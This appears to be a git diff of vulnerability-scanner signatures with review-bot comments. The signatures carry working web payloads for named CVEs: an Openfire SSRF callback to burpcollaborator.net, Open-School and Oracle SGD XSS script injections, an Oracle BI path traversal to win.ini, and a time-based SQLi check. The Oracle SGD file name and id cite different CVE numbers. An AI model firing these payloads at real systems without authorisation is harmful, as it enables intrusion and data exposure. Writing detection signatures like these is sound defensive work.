@@ -0,0 +1,22 @@ +id: CVE-2019-18394 +info: + name: OpenFire SSRF + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + getFavicon +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?host=burpcollaborator.net + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StringSearch("resBody", "Burp Collaborator Server") +references: + - https://www.cvebase.com/cve/2019/18394 diff --git a/cves/openfire-ssrf.yaml b/cves/openfire-ssrf.yaml deleted file mode 100644 index 7412145..0000000 --- a/cves/openfire-ssrf.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: openfire-ssrf -info: - name: Openfire SSRF (CVE-2019-18394) - risk: Medium - -params: - - root: "{{.BaseURL}}" - - dest: "vvu8gyyr70izifx81a5iuc4gj7pzdo.burpcollaborator.net" - -requests: - - method: GET - redirect: false - url: >- - {{.root}}/getFavicon?host={{.dest}} - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && RegexSearch("body", "(?m)\\\\[a-z0-9]+") - -references: - - link: https://swarm.ptsecurity.com/openfire-admin-console/ \ No newline at end of file diff --git a/cves/openproject-sqli.yaml b/cves/openproject-sqli-cve-2019-11600.yaml similarity index 81% rename from cves/openproject-sqli.yaml rename to cves/openproject-sqli-cve-2019-11600.yaml index 3a6f384..60a4b17 100644 --- a/cves/openproject-sqli.yaml +++ b/cves/openproject-sqli-cve-2019-11600.yaml @@ -1,7 +1,7 @@ -id: cve-01-05 +id: CVE-2019-11600 type: list info: - name: OpenProject SQLi CVE-2019-11600 + name: OpenProject SQLi risk: Critical origin: 
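Review bot: The SSRF probe hard-codes `host=burpcollaborator.net` and matches `"Burp Collaborator Server"` in the body, so every scanned Openfire server is made to call out to a third-party host the operator does not control, and the check works only as long as that public host answers favicon fetches with that banner. The deleted `openfire-ssrf.yaml` exposed the callback host as a `dest` parameter; keep that shape so operators can point it at their own interaction server and match on a marker they choose. The rating also moved from Medium to Critical for the same unauthenticated SSRF; either justify that or align it with the other SSRF entries.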
@@ -29,5 +29,4 @@ requests: Math.abs(ResponeTime() > OriginResponeTime()) > 3 reference: - - link: https://www.exploit-db.com/exploits/46838 - - affected version: OpenProject 5.0.0 - 8.3.1 - SQL Injection \ No newline at end of file + - https://www.cvebase.com/cve/2019/11600 \ No newline at end of file diff --git a/cves/openschool-xss-cve-2019-14696.yaml b/cves/openschool-xss-cve-2019-14696.yaml new file mode 100644 index 0000000..2cebed1 --- /dev/null +++ b/cves/openschool-xss-cve-2019-14696.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-14696 +info: + name: Open-School XSS + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + index.php +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") +references: + - https://www.cvebase.com/cve/2019/14696 diff --git a/cves/oracle-bi-path-traversal-cve-2019-2588.yaml b/cves/oracle-bi-path-traversal-cve-2019-2588.yaml new file mode 100644 index 0000000..5defa11 --- /dev/null +++ b/cves/oracle-bi-path-traversal-cve-2019-2588.yaml 
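Review bot: Along with the exploit-db link this hunk removes the `affected version: OpenProject 5.0.0 - 8.3.1` line, which was the only place the signature stated which versions it applies to; the aggregator URL is a fine pointer, but the affected range belongs in the file, e.g. `# affected: OpenProject 5.0.0 - 8.3.1` under `info:`. More generally, replacing primary sources (vendor advisory, original write-up) with a single aggregator link loses the provenance a triager needs when a signature misfires — keep both.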
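Review bot: The Open-School detection `StatusCode() == 200 && StringSearch("resBody", "")` has an empty search string, which matches every 200 response. If the `<script>` markup was stripped when this page was rendered, disregard; otherwise the clause should look for the reflected payload, `StringSearch("resBody", '"><script>alert(document.domain)</script>')`. A unique marker in the payload, as the Olimpoks signature does with `g147`, would also keep the match robust against pages that legitimately contain `alert(document.domain)`.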
@@ -0,0 +1,22 @@ +id: CVE-2019-2588 +info: + name: Oracle Business Intelligence Path Traversal + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + xmlpserver/servlet/adfresource +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "for 16-bit app support") +references: + - https://www.cvebase.com/cve/2019/2588 diff --git a/cves/iplanet-disclosure.yaml b/cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml similarity index 78% rename from cves/iplanet-disclosure.yaml rename to cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml index 26e2d8b..0d401ce 100644 --- a/cves/iplanet-disclosure.yaml +++ b/cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml @@ -1,6 +1,6 @@ -id: iplanet-unauth-01 +id: CVE-2020-9315 info: - name: Oracle iPlanet unauth access + name: Oracle iPlanet Improper Authorization risk: High params: @@ -10,7 +10,6 @@ variables: - endpoint: | /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 - requests: - method: GET url: >- 
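Review bot: The CVE-2019-2588 payload only requests `..\..\Windows\win.ini` and matches `for 16-bit app support`, so Oracle BI Publisher instances on Linux or Solaris — the common deployment — are never flagged. Add a second endpoint line with a `..%2F` traversal to `/etc/passwd` and extend the detection with the `RegexSearch("resBody", "root:[x*]:0:0:")` clause used elsewhere in this commit; I have not confirmed that the servlet accepts forward slashes, so test against a known-vulnerable build before merging.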
@@ -22,6 +21,5 @@ requests: StatusCode() == 200 && StringSearch("response", "Admin Console") && StringSearch("response", "serverConfigurationsGeneral") - >- StatusCode() == 200 && StringSearch("response", "Admin Console") && StringSearch("response", "serverCertificatesGeneral") - references: - - link: https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/ + - https://www.cvebase.com/cve/2020/9315 \ No newline at end of file diff --git a/cves/oracle-sgd-xss-cve-2018-19439.yaml b/cves/oracle-sgd-xss-cve-2018-19439.yaml new file mode 100644 index 0000000..9ec3b18 --- /dev/null +++ b/cves/oracle-sgd-xss-cve-2018-19439.yaml @@ -0,0 +1,22 @@ +id: CVE-2018-19349 +info: + name: Oracle SGD XSS + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?=&windowTitle=AdministratorHelpWindow>